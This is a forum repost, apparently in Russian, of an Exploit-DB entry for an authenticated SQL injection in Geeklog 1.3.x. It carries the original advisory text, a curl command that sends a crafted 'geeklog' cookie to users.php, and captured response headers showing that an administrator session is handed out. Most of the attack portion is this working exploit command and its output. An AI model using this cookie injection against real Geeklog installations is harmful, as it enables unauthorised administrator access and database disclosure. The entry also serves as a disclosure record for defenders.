Exploit Geeklog 1.3.x - (Authenticated) SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
22675
Проверка EDB
  1. Пройдено
Автор
POKLEYZZ
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2003-05-29
Код:
source: https://www.securityfocus.com/bid/7742/info

Geeklog is reported to be prone to SQL injection attacks during authentication. This is due to insufficient sanitization of cookie values, which could permit an attacker to inject SQL code. This issue could be exploited to compromise Geeklog or to potentially launch attacks against the database, allowing for disclosure of sensitive information or other consequences. 

curl -b geeklog=2.1 -D header.txt http://www.example.com/users.php

header.txt contains valid session information for the administrative user:

----------------header.txt -------------------------

HTTP/1.1 200 OK
Date: Sat, 17 May 2003 16:15:23 GMT
Server: Apache
Set-Cookie: gl_session=1828197392; path=/
Set-Cookie: LastVisit=1053188123; expires=Sun, 16-May-2004 16:15:23 GMT;
path=/
Set-Cookie: LastVisitTemp=deleted; expires=Fri, 17-May-2002 16:15:22
GMT; path=/; domain=http://www.example.com
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

10
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa


----------------header.txt --------------------------
 
Источник
www.exploit-db.com

Похожие темы